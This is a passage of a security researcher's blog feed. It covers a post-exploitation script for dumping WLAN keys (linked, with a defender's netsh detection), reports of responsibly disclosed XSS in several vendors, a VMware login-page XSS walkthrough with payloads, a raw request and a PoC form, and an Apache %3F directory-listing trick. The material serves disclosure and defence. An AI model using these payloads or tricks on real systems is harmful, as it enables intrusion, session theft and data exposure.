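def rewrite_location(substitution: str, captured: str, ne: bool) -> str:
    """Location value that a redirecting RewriteRule produces for one capture.
    Simplified model of mod_rewrite's default escaping: without NE the '#' in the
    substitution is percent-encoded (Apache escapes other special characters too,
    but '#' is the one that matters here); with NE it is emitted as-is."""
    target = substitution.replace("$1", captured)
    return target if ne else quote(target, safe="/?&=:")


def what_the_server_sees(url: str) -> dict:
    """Split a URL the way a browser does before sending the request.
    Text after an unescaped '#' is a fragment and never leaves the client, so the
    server only receives the path before it; '%23' is an ordinary path character
    that Apache decodes to a literal '#' when it maps the path to the filesystem."""
    parts = urlsplit(url)
    decoded_path = unquote(parts.path)
    return {
        "request_path": parts.path,                      # what appears in the request line
        "fragment_kept_by_client": parts.fragment,
        "decoded_path": decoded_path,                    # what Apache maps to a file or directory
        "is_directory_request": decoded_path.endswith("/"),
        "filename": decoded_path.rsplit("/", 1)[-1],
    }


if __name__ == "__main__":
    # The example rule quoted from the Apache documentation, with and without NE.
    for ne in (True, False):
        print("NE" if ne else "no NE", "->", rewrite_location("/bigpage.html#$1", "xyz", ne))
    # The two URL patterns tested in the post.
    for url in ("http://www.example.com/temp/#htaccess.cl",
                "http://www.example.com/temp/%23htaccess.cl"):
        print(url, what_the_server_sees(url))
```

With the unescaped '#' (case 1) the server receives only /temp/, which is consistent with the directory listing observed; with %23 (case 2) it receives a request for the file named #htaccess.cl.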
<br /></div>
<b>A Sweet Script to Dump Keys from Wlan Profiles - Post Exploitation (or Regular Use)</b> (2013-04-09)<br />
<b>Update: </b>Just found that PaulDotCom has written about this blog post in episode 327: <b><a href="http://pauldotcom.com/wiki/index.php/Episode327">http://pauldotcom.com/wiki/index.php/Episode327</a>.</b><br />
<b><br /></b>
<i>"This is a great example of so many things. First, it's a really neat little script (though I imagine the powershell junkies will be excited to convert it). It highlights the importance of post-exploitation. But that is really just a term for us gear heads. What this means for the organization is terrible. It means you can exploit systems that really don't seem to matter, maybe Jane's computer was compromised and didn't have any sensitive data on it and her account does not. However, Jane connects to the same "secure" wireless network as more important people, say Bob from finance. Now, a small little hole, like a missing Adobe patch, just coughed up the keys to your kingdom. It means that vulnerabilities and risk have this weird relationship and it's one of the toughest things to understand, until you have a pen test."</i><br />
<br />
After exploitation, retrieving data from the compromised machine is always an interesting scenario. Considering the time factor, even a small automation is productive. Running the same command several times is not bad, but it's better to take the next step.<br />
<br />
The script presented below dumps the security keys for all the WLAN profiles present on the compromised system (if you have administrator access). I use this sweet script to do the work, so use it whenever you want.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUiizZ02w88-UQIgRZql4I9iK89tHXk8n6ygblFAqUTYReR2m7HpMktgHTBRqtSo-rlmzhrvTiemYQMXX7hu9oQXHJrYLzcbPtoV7zWi1Ufv-XNRqhBfICbhm6eRK1ZPmE0a-65A/s1600/dump_wlan_keys.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="450" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUiizZ02w88-UQIgRZql4I9iK89tHXk8n6ygblFAqUTYReR2m7HpMktgHTBRqtSo-rlmzhrvTiemYQMXX7hu9oQXHJrYLzcbPtoV7zWi1Ufv-XNRqhBfICbhm6eRK1ZPmE0a-65A/s640/dump_wlan_keys.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Wlan Profiles - Security Keys Dumping Script<br />
<br />
<div style="text-align: left;">
<span style="font-size: small;">It outputs as:</span></div>
<div style="text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisMjQC3if5oqzBaStdYA_-4zQ6OXwxUVnRFfF25Y82TIJRYLkam3s0BohVBxCdIOD1FDbHAz0kpl45TQdnvOSrRteHlKUOiFet_vrakDbZcW-_f5_ftEVsDq_zZOKPNiekaZd9YQ/s1600/output_wlan_dump.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="416" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisMjQC3if5oqzBaStdYA_-4zQ6OXwxUVnRFfF25Y82TIJRYLkam3s0BohVBxCdIOD1FDbHAz0kpl45TQdnvOSrRteHlKUOiFet_vrakDbZcW-_f5_ftEVsDq_zZOKPNiekaZd9YQ/s640/output_wlan_dump.png" width="640" /></a></div>
<div style="text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-size: small;">Fetch the batch script from here: <a href="http://www.secniche.org/tools/dump_wlan_config.txt"><b>http://www.secniche.org/tools/dump_wlan_config.txt</b></a></span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-size: small;">Enjoy!</span></div>
</td></tr>
</tbody></table>
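From the defender's side, as an added example that is not the author's script: the batch script issues one netsh command per profile with key=clear, which leaves a distinctive trail in process-creation logs. The Python detection below runs over constructed Sysmon/4688-style records (the time|host|user|image|commandline layout is assumed here) and flags both the key=clear export and the burst of profile reads such a script produces.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation records (not a real log): time|host|user|image|commandline
SAMPLE_LOG = r"""
2013-04-09T22:31:01|WS01|alice|C:\Windows\System32\netsh.exe|netsh wlan show profiles
2013-04-09T22:31:02|WS01|alice|C:\Windows\System32\netsh.exe|netsh wlan show profile name="corp-secure" key=clear
2013-04-09T22:31:02|WS01|alice|C:\Windows\System32\netsh.exe|netsh wlan show profile name="guest" key=clear
2013-04-09T22:31:03|WS01|alice|C:\Windows\System32\netsh.exe|netsh wlan show profile name="home-ap" key=clear
2013-04-09T22:35:00|WS02|bob|C:\Windows\System32\netsh.exe|netsh interface ip show config
2013-04-09T22:40:00|WS03|carol|C:\Windows\System32\netsh.exe|netsh wlan show profile name="corp-secure"
"""

# Any netsh invocation that reads WLAN profile data (matches "profile" and "profiles").
WLAN_PROFILE_RE = re.compile(r"\bnetsh(?:\.exe)?\b.*\bwlan\b.*\bshow\b.*\bprofile", re.IGNORECASE)
# The switch that makes netsh print the pre-shared key in clear text.
KEY_CLEAR_RE = re.compile(r"\bkey\s*=\s*clear\b", re.IGNORECASE)


def parse_events(log_text: str) -> list:
    """Turn the pipe-separated records into dicts with a parsed timestamp."""
    events = []
    for line in log_text.strip().splitlines():
        ts, host, user, image, cmdline = line.split("|", 4)
        events.append({"time": datetime.fromisoformat(ts), "host": host,
                       "user": user, "image": image, "cmdline": cmdline})
    return events


def detect_wlan_key_dumps(events, burst_threshold=3, window=timedelta(seconds=60)) -> list:
    """Two rules: (high) any profile read with key=clear; (medium) a burst of
    profile reads from one host inside `window`, which is what a loop over all
    profiles looks like even if the key switch were obfuscated."""
    alerts = []
    profile_reads = defaultdict(list)
    for ev in events:
        if not WLAN_PROFILE_RE.search(ev["cmdline"]):
            continue
        profile_reads[ev["host"]].append(ev["time"])
        if KEY_CLEAR_RE.search(ev["cmdline"]):
            alerts.append({"rule": "wlan_key_export", "severity": "high", "host": ev["host"],
                           "user": ev["user"], "cmdline": ev["cmdline"]})
    for host, times in profile_reads.items():
        times.sort()
        for i, start in enumerate(times):
            in_window = sum(1 for t in times[i:] if t - start <= window)
            if in_window >= burst_threshold:
                alerts.append({"rule": "wlan_profile_enumeration_burst", "severity": "medium",
                               "host": host, "count": in_window})
                break                       # one burst alert per host is enough
    return alerts


if __name__ == "__main__":
    for alert in detect_wlan_key_dumps(parse_events(SAMPLE_LOG)):
        print(alert)
```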
<br />
<b>Responsible Disclosure : XSS in Damballa Reported and Patched !</b> (2013-03-26)<br />
Last weekend, I was reading some research papers available at the Damballa website, which are awesome without any doubt. I was surfing the website and, to my surprise, I found an XSS vulnerability in it. Since Damballa provides anti-malware solutions, XSS can be used for malicious purposes. Under responsible disclosure constraints, I contacted David Holmes of Damballa and revealed the issue. What makes a responsible disclosure interesting is a prompt reply from the vendor who is willing to patch the vulnerability without any complexities. The same happened with Damballa. They patched the bug right away. In addition, I had a good discussion with David Holmes about why the issue persisted in the website.<br />
<br />
I expect that every vendor should be prompt enough to patch the issue.<br />
<br />
Proof-of-Concept (PoC):<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj4lwVhFR8k516ntMMSueMJNnL9ru5FGlUeRkgk58Xftc99d5zXOjjjwRkg8QIlNIRCU3lIZOKF4OUJiDU1KfFUzhXQZLP7xVm8MYgmrcetSCckBSgV5k-z9-TD-La-PzIWXLuYg/s1600/damballa_xss_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="355" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj4lwVhFR8k516ntMMSueMJNnL9ru5FGlUeRkgk58Xftc99d5zXOjjjwRkg8QIlNIRCU3lIZOKF4OUJiDU1KfFUzhXQZLP7xVm8MYgmrcetSCckBSgV5k-z9-TD-La-PzIWXLuYg/s640/damballa_xss_1.png" width="640" /></a></div>
<br />
Be responsible in disclosing bugs.<br />
<b>VMware Management Interface - A Little Story of XSS</b> (2013-01-27)<br />
<div style="text-align: left;">
As a part of my open research, I came across an XSS vulnerability in the VMware management interface, which is used by VMware ESX and GSX servers. I thought it might be a new issue, but interestingly a number of XSS issues have already been reported to the VMware security team. The list can be found here: <a href="http://www.cvedetails.com/vulnerability-list/vendor_id-252/opxss-1/Vmware.html">http://www.cvedetails.com/vulnerability-list/vendor_id-252/opxss-1/Vmware.html</a></div>
<div>
<div style="text-align: left;">
<br /></div>
</div>
<div class="separator" style="clear: both; text-align: left;">
On another note, a number of VMware management interfaces exposed on the Internet are still vulnerable. Of course, the administrators have not deployed patches or upgraded the required software. I didn't get enough details on the XSS issue (maybe I missed it), so I thought I would talk about the issue in detail here. I am not going to list which versions are affected; you can get that information in the advisories. I will talk about the issue. The management interface looks as presented below:</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbgtjYpuwlVRqLA9VrpLdx3L8koHJiplu1qz8u-VC1ZhTTu4UD_OOVDVYiSxZzx6Ul_IUvLqguXkQVyJXqJ_OAuSzFNLVQzmcWJBiUN6h0_GodBMZgbBdmNfNGCJDG5MnmGXEzAg/s1600/vmware_man_interface_1.png" imageanchor="1" style="margin-left: auto; margin-right: auto; text-align: center;"><img border="0" height="305" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbgtjYpuwlVRqLA9VrpLdx3L8koHJiplu1qz8u-VC1ZhTTu4UD_OOVDVYiSxZzx6Ul_IUvLqguXkQVyJXqJ_OAuSzFNLVQzmcWJBiUN6h0_GodBMZgbBdmNfNGCJDG5MnmGXEzAg/s640/vmware_man_interface_1.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>VMware Management Interface</b></td></tr>
</tbody></table>
<div>
The username and password fields are given the ids "l" and "m" respectively. Interestingly, the vulnerable interfaces use client-side encoding to obfuscate the input values entered by the user. But this can be taken care of by using a proxy: the value can be passed directly without encoding (alter the HTTP request and POST parameters in a proxy such as Burp, Charles, etc.). For example, if you specify the parameters as follows:<br />
<br />
<b><i>l="/>"/>"/><script>alert(document.cookie);</script></i></b><br />
<b><i>m=test</i></b><br />
<br />
it gets encoded as follows:<br />
<br />
<b><i>l = Ii8+Ii8+Ii8+PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==</i></b><br />
<b><i>m = dGVzdA==</i></b><br />
<b><br /></b>
Well, it's not a complex encoding, only Base64. Even if one uses the proxy to pass the values without encoding, due to the client-side work the XSS payload fails to render in the webpage. The output looks as follows:<br />
<br />
<br />
<i><html><head><title>Login: VMware Management Interface</title><script> var <b>user="Ii8+Ii8+Ii8+PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==";var err="-4";var str="Permission denied: Login (username/password) incorrect";var next=null;</b></i><br />
<i><b></script></head><body bgcolor="#336699" </b>onload="try{if(parent.loginCb)parent.loginCb(self);}catch(e){;}"></body></html></i><br />
<br />
<br />
It reflects back our XSS payload, but in Base64 encoded format, which is rendered as useless data. The vulnerability persisted in the handling of these parameters on the server side: if you check, the same payload is reflected back without any additional modification. The server does not perform any encoding or input validation; it's all client side. <b>The idea is to simply render this payload without encoding.</b> All the POST requests are handled by <b><i>/sx-login/index.pl</i></b>. Let's see:<br />
<b><br /></b>
<i><b>(Request-Line)<span class="Apple-tab-span" style="white-space: pre;"> </span>POST /sx-login/index.pl HTTP/1.1</b></i><br />
<i><b>Host: <vulnerable_host_ip></vulnerable_host_ip></b></i><br />
<br />
<i>User-Agent:<span class="Apple-tab-span" style="white-space: pre;"> </span>Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0</i><br />
<i>Accept:<span class="Apple-tab-span" style="white-space: pre;"> </span>text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</i><br />
<i>Accept-Language:<span class="Apple-tab-span" style="white-space: pre;"> </span>en-US,en;q=0.5</i><br />
<i>Accept-Encoding:<span class="Apple-tab-span" style="white-space: pre;"> </span>gzip, deflate</i><br />
<i>Referer:<span class="Apple-tab-span" style="white-space: pre;"> </span>https://82.133.251.1/vmware/en/login.html</i><br />
<i>Cookie:<span class="Apple-tab-span" style="white-space: pre;"> </span>vmware.mui.test=1; vmware.mui.test=1</i><br />
<i>Connection:<span class="Apple-tab-span" style="white-space: pre;"> </span>keep-alive</i><br />
<i>Content-Type:<span class="Apple-tab-span" style="white-space: pre;"> </span>application/x-www-form-urlencoded</i><br />
<i>Content-Length:<span class="Apple-tab-span" style="white-space: pre;"> </span>95</i><br />
<br />
<br />
The simple proof of concept (PoC) shown below sends the request directly to /sx-login/index.pl without any encoding, which makes the XSS work.<br />
<br />
<br />
<i><html></i><br />
<i><body></i><br />
<i><br /></i>
<i><b><form name="k" id="k" method="post" action="https://example.com/sx-login/index.pl" target="data"></b></i><br />
<i><b><input name="l" type="text" value='"--></style></script><script>alert(document.location);</script>"'/></b></i><br />
<i><b><input name="m" type="password" value="test"/></b></i><br />
<i><b><input type="submit" value="Submit"></b></i><br />
<i></form></i><br />
<i><br /></i>
<i></body></i><br />
<i></html></i><br />
<b><i><br /></i></b>
Once this form is successfully submitted, it results in XSS as shown below:<br />
<br />
<br />
<i><html><head><title>Login: VMware Management Interface</title><script></i><br />
<i><b>var user=""--></style></script><script>alert(document.location);</script>"";var err="-4";var str="Permission denied: Login (username/password) incorrect";var next=null;</b></i><br />
<i><b></script></head><body bgcolor="#336699" </b>onload="try{if(parent.loginCb)parent.loginCb(self);}catch(e){;}"></body></html></i><br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsDy7ic8scSpqZKjtlqpUfDWC3HBVrk_LndWmzGFsvvwaHgXOKUb98-7B51uJ19RHHls8CQ3mo0_7K1ymJHkXxW2Ost4-DQ20UY49Z4HvWfWfqy0kX0XOeGgQmq3SuLBDXmBsAnA/s1600/vmware_man_interface_2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="286" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsDy7ic8scSpqZKjtlqpUfDWC3HBVrk_LndWmzGFsvvwaHgXOKUb98-7B51uJ19RHHls8CQ3mo0_7K1ymJHkXxW2Ost4-DQ20UY49Z4HvWfWfqy0kX0XOeGgQmq3SuLBDXmBsAnA/s640/vmware_man_interface_2.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Successful XSS Injection</b></td></tr>
</tbody></table>
On patched systems, the web server replied back as follows:<br />
<br />
<i><html><head><title>Login: VMware Management Interface</title><script></i><br />
<i><b>var user="\"--\u003E\u003C/style\u003E\u003C/script\u003E\u003Cscript\u003Ealert(document.location);\u003C/script\u003E\"";var err="-4";var str="Permission denied: Login (username/password) incorrect";var next=null;</b></i><br />
<i></script></head><body bgcolor="#336699" onload="try{if(parent.loginCb)parent.loginCb(self);}catch(e){;}"></body></html></i><br />
<br />
The patched versions now use server-side Unicode escaping to neutralize the XSS payload.<br />
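As an added example (not VMware's code), here is a Python model of the login response shape shown above: the vulnerable rendering that reflects the submitted username verbatim into the script block, next to a hardened rendering that applies \uXXXX escaping in the spirit of the patched version. The template constant and the escaping function are assumptions of this example, not the product's implementation.

```python
# Constructed reproduction of the login response shown in the post; the
# placeholders are filled by the two render functions below.
LOGIN_TEMPLATE = (
    '<html><head><title>Login: VMware Management Interface</title><script>'
    'var user="{user}";var err="{err}";var str="{msg}";var next=null;'
    '</script></head><body bgcolor="#336699" '
    'onload="try{{if(parent.loginCb)parent.loginCb(self);}}catch(e){{;}}"></body></html>'
)
LOGIN_FAILED = "Permission denied: Login (username/password) incorrect"


def render_vulnerable(user: str) -> str:
    """Unpatched behaviour: the submitted 'l' value is copied into the script block verbatim."""
    return LOGIN_TEMPLATE.format(user=user, err="-4", msg=LOGIN_FAILED)


def js_string_escape(value: str) -> str:
    """Escape a value for a double-quoted JavaScript string literal inside a script element.
    Everything except ASCII letters, digits and a few harmless punctuation characters
    becomes \\uXXXX, so quotes, backslashes, angle brackets, '/' and line terminators
    can never terminate the string, the script element or the surrounding HTML."""
    out = []
    for ch in value:
        code = ord(ch)
        if (ch.isascii() and ch.isalnum()) or ch in " ,.:_-@":
            out.append(ch)
        elif code > 0xFFFF:                              # astral plane: emit a surrogate pair
            code -= 0x10000
            out.append("\\u%04X\\u%04X" % (0xD800 + (code >> 10), 0xDC00 + (code & 0x3FF)))
        else:
            out.append("\\u%04X" % code)                 # e.g. '>' -> \u003E, as in the patched output
    return "".join(out)


def render_hardened(user: str) -> str:
    """Patched behaviour modelled on the post: escape server-side before reflecting."""
    return LOGIN_TEMPLATE.format(user=js_string_escape(user), err="-4", msg=LOGIN_FAILED)


def script_context_intact(html: str) -> bool:
    """True when the response still contains exactly one script element, i.e. the
    reflected value did not break out of the string or the script block."""
    lowered = html.lower()
    return lowered.count("<script") == 1 and lowered.count("</script") == 1


if __name__ == "__main__":
    # The payload from the PoC form above, run through both renderings.
    payload = '"--></style></script><script>alert(document.location);</script>'
    print("vulnerable intact:", script_context_intact(render_vulnerable(payload)))
    print("hardened intact:  ", script_context_intact(render_hardened(payload)))
```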
<br />
Enjoy!</div>
<b>Responsible Disclosure : XSS in UBM</b> (2013-01-24)<br />
Last year, I reported an XSS issue in <a href="http://ubminformation.com/">ubminformation.com</a>, which was used by the UBM organization. I revealed the details to Trey Ford, and the result is as expected: the issue has been patched :). The domain is no longer valid as it redirects all traffic to the primary website <a href="http://ubm.com/">ubm.com</a>.<br />
<br />
This issue was an outcome of open research. The good point is that the vulnerability got noticed and patched.<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgusYt0kvTNUXOM_V1vLF2VLH0baSxvFnr9pGD2P6_IcCNu0wTajb44Gu7g7EKd8Lw1Jxg6iFPie0Zbn7N8GCKWspQRdoi-YA8BHBclZGypPtfIovp5eyfS5nAKINdcEhmVRVEauA/s1600/ubm_xss_1.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="294" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgusYt0kvTNUXOM_V1vLF2VLH0baSxvFnr9pGD2P6_IcCNu0wTajb44Gu7g7EKd8Lw1Jxg6iFPie0Zbn7N8GCKWspQRdoi-YA8BHBclZGypPtfIovp5eyfS5nAKINdcEhmVRVEauA/s640/ubm_xss_1.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">XSS - 1 </td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: left;">
and ...</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJ2AOAxW-fvPlvXTzYVn0A97csQHQ164t3i3d9UpFTQImj9MptGHZQN_BmYYdCL3ZvVeHcky3dB4H4mMh_FXi5u6DtKY3ZwemRKQagGdCXGGSdeYNl6Lin0AUJ9JDgEkEqOrRaxQ/s1600/ubm_xss_2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="283" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJ2AOAxW-fvPlvXTzYVn0A97csQHQ164t3i3d9UpFTQImj9MptGHZQN_BmYYdCL3ZvVeHcky3dB4H4mMh_FXi5u6DtKY3ZwemRKQagGdCXGGSdeYNl6Lin0AUJ9JDgEkEqOrRaxQ/s640/ubm_xss_2.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">XSS - 2</td></tr>
</tbody></table>
<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0tag:blogger.com,1999:blog-30098758.post-20267419678820499762013-01-20T16:36:00.003-08:002013-01-27T21:22:43.886-08:00(Pentest Apache #2) - The Beauty of "%3F" and Apache's Inability | Wordpress | Mod Security<b>Tested Apache Version: Apache 1.3.37(Unix) (with different modules)</b><br />
<div>
<div>
<br /></div>
<div>
I was doing open research and came across an interesting issue that helps a penetration tester gather more information about the files present (directory listing) in a specific folder on the web server. I tested only one version of Apache for this. Let's understand this issue. The problem lies in how Apache processes the encoded form of <b>"?"</b>, which is <b>"%3F"</b>.</div>
<div>
<br /></div>
<div>
<b>Testing:</b> During the validation, I found that WordPress was running on Apache 1.3.37 (Unix). Due to a misconfiguration, it was possible to access the <b>/wp-includes/ </b>folder, which resulted in a directory listing as shown below:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzsQgqnDVVRJTgaiOV95HZ9olxwTNXqBHJDK2bV7ohaP94t386yAzkwj2k5gWsEymcxn7kvOF8lIv8_yzYw8TIzvQ0OW8trVzjk56J2hMFwbJ3L38V2jVDaHhO851DxZuafbku3A/s1600/apache_2_wordpress_dir_listing_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="427" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzsQgqnDVVRJTgaiOV95HZ9olxwTNXqBHJDK2bV7ohaP94t386yAzkwj2k5gWsEymcxn7kvOF8lIv8_yzYw8TIzvQ0OW8trVzjk56J2hMFwbJ3L38V2jVDaHhO851DxZuafbku3A/s640/apache_2_wordpress_dir_listing_1.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
So, when I accessed the <b>/wp-admin/ </b>directory, it redirected me to the login page as presented below:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6HQmP-pAVN9f9q_oCDMrcweRqJYvVGFwijtKurJ1_BXUEz-4iZIffk7cs3RRTdagMw74-xrkqgQGD3YzjN5N7gq1miJwwQro3C-sjH6l-CSFhm-MWGKnL-Q7ABKOg9S3YWlG7HQ/s1600/apache_2_wordpress_dir_listing_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="409" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6HQmP-pAVN9f9q_oCDMrcweRqJYvVGFwijtKurJ1_BXUEz-4iZIffk7cs3RRTdagMw74-xrkqgQGD3YzjN5N7gq1miJwwQro3C-sjH6l-CSFhm-MWGKnL-Q7ABKOg9S3YWlG7HQ/s640/apache_2_wordpress_dir_listing_2.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
The screenshot above shows the correct behavior of WordPress (or the Apache server) when the /wp-admin/ directory is accessed. Now, when I accessed <b><a href="http://www.example.com/blog/">http://www.example.com/blog/</a></b>, the web server displayed the contents of the WordPress blog, such as posts and entries. </div>
<div>
<br /></div>
<div>
<b>Question :</b> Is it possible to get the directory listing on accessing the <b>/blog/ directory?</b></div>
<div>
<b>Answer :</b> Yes, It can be done in some web servers such as Apache.</div>
<div>
<br /></div>
<div>
<b>Question :</b> How can it be possible?</div>
<div>
<b>Answer : </b>I exploited the behavior of Apache in processing the encoded <b>"?"</b> character, whose value is <b>"%3F"</b>. Amazingly, it worked. I constructed the payload as: <b><a href="http://www.example.com/blog/%3Fpage_id=34">http://www.example.com/blog/%3Fpage_id=34</a>. [One can use any id number or parameter]</b></div>
<div>
<b><br /></b></div>
<div>
<b>Other examples:</b></div>
<div>
<b><a href="http://www.example.com/blog/%3Fp_id=34">http://www.example.com/blog/%3Fp_id=34</a></b></div>
<div>
<b><a href="http://www.example.com/blog/%3Fpg_id=34">http://www.example.com/blog/%3Fpg_id=34</a></b></div>
<div>
<b><br /></b></div>
<div>
When I used the above stated payload, I got the response as follows:</div>
<div>
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEippukAlDWoG7Zd6x-Im3ndcHyGQBHLlZevk1y0cjRWafQNXjHbzA3DPuzOGT-IoD7uSeEq-4K-I9DMIiHlGpjPU9kHBoVcAmLVaIh4dmO_pDl3RKmQ4zkVdbDxL3CDc2JuX9-VAw/s1600/apache_2_wordpress_dir_listing_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEippukAlDWoG7Zd6x-Im3ndcHyGQBHLlZevk1y0cjRWafQNXjHbzA3DPuzOGT-IoD7uSeEq-4K-I9DMIiHlGpjPU9kHBoVcAmLVaIh4dmO_pDl3RKmQ4zkVdbDxL3CDc2JuX9-VAw/s640/apache_2_wordpress_dir_listing_3.png" width="640" /></a></div>
<div>
<b><br /></b></div>
<div>
<br /></div>
<div>
This gave me the listing of the<b> /blog/</b> directory, which revealed which files were present on the remote web server. But if I used the payload <b><a href="http://www.example.com/blog/?page_id=34">http://www.example.com/blog/?page_id=34</a></b> without encoding, it did not work. So encoding the <b>"?"</b> character caused the Apache web server to fail to process the request as intended, and the result was a directory listing.</div>
<div>
<br /></div>
<div>
Let's have a look at the HTTP response headers:</div>
<div>
<br /></div>
<div>
Request 1: <b><a href="http://www.example.com/blog/%3Fpage_id=34">http://www.example.com/blog/%3Fpage_id=34</a>.</b></div>
<div>
<div class="MsoNormal">
<pre>(Status-Line) HTTP/1.1 200 OK
Date Sun, 20 Jan 2013 19:22:59 GMT
Server VHFFS / Apache/1.3.34 (Unix) mod_lo/1.0 PHP/4.4.4 with Hardening-Patch mod_ssl/2.8.25 OpenSSL/0.9.8b mod_chroot/0.5
Content-Type text/html; charset=ISO-8859-1
Transfer-Encoding chunked</pre></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Request 2: <b><a href="http://www.example.com/blog/?page_id=34">http://www.example.com/blog/?page_id=34</a></b></div>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<pre>(Status-Line) HTTP/1.1 200 OK
Date Sun, 20 Jan 2013 19:23:48 GMT
Server VHFFS / Apache/1.3.34 (Unix) mod_lo/1.0 PHP/4.4.4 with Hardening-Patch mod_ssl/2.8.25 OpenSSL/0.9.8b mod_chroot/0.5
<b>X-Powered-By PHP/5.1.5 with Hardening-Patch</b>
Content-Type text/html; charset=ISO-8859-1
Transfer-Encoding chunked</pre></div>
<br />
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
In request 2, the response carries an X-Powered-By header that the first response lacks, which indicates that PHP handled the unencoded request but not the %3F one.</div>
</div>
<div>
<b><br /></b></div>
<div>
<b>Constraint: </b>With this technique, one can only obtain the directory listing; the listed files themselves are not accessible unless there is a further misconfiguration.</div>
<div>
<br /></div>
<div>
<b>Background: </b>I forced Google to provide me with related information and I got the related links as follows:</div>
<div>
<br /></div>
<div>
1. <a href="http://stackoverflow.com/questions/9786853/apache-not-processing-encoded-urls-with-3f">http://stackoverflow.com/questions/9786853/apache-not-processing-encoded-urls-with-3f</a></div>
<div>
2. <a href="https://issues.apache.org/bugzilla/show_bug.cgi?id=34602">https://issues.apache.org/bugzilla/show_bug.cgi?id=34602</a></div>
<div>
<br /></div>
<div>
<b>Solution:</b> Configure appropriate rewrite rules using mod_rewrite to prevent this type of issue; see [1] for details.</div>
<div>
<br /></div>
<div>
Note: If any reader has a specific view on this, please respond back. </div>
</div>
<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0tag:blogger.com,1999:blog-30098758.post-68060511289102522702013-01-20T10:37:00.001-08:002013-01-27T21:23:26.254-08:00DEFCON 20 Talk : Botnets Die Hard : Owned and Operated Video<center>
